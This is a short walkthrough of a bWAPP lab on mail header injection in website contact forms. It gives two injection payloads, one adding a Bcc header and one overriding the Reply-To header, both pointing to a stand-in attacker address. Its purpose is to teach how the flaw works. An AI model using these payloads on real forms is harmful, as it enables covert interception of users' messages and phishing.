Premise
In this post walkthrough, we went through a common web application security issue found in contact forms on any website. This security issue allows for the insertion of certain characters and commands that create a copy of every email and inquiry without the website administrator’s knowledge. We used bWAPP from OWASP to demonstrate this.
Skills Learned
- bWAPP
- OWASP
- Mail Header Injection
How a Contact Form Normally Works
I start by showing you a standard contact form on a website. You know the type: you enter your name, email address, and a message. I then take you behind the scenes to look at the code. You can see how the information you enter is stored in variables like name, reply to, and message. The interesting part is the reply to field. Even though you don’t see it on the form, it’s what the website’s administrator uses to reply to your email.
From Normal to Malicious
I first walk you through a normal scenario where a user sends a message, and the administrator gets it, just as you’d expect. Then, I show you how things can turn malicious. I explain how email injection can be used for things like phishing attacks or to secretly send copies of emails to an attacker’s email address.
The Attack in Action
The main part of the attack is injecting new lines and extra email headers into the reply to field. Here’s how I do it:
- BCC Injection: I show you how by adding a simple line of code (
\nBcc: attacker@attacker.com) to the email field, an attacker can get a copy of every single message sent through the contact form. This is a serious information leak. - Manipulating the Reply-To Field: I also demonstrate how an attacker can change the
reply toaddress to their own. By adding\nReply-To: attacker@attacker.com, any reply from the administrator to a customer’s message will also be sent to the attacker. This can be used to set up very convincing phishing attacks.
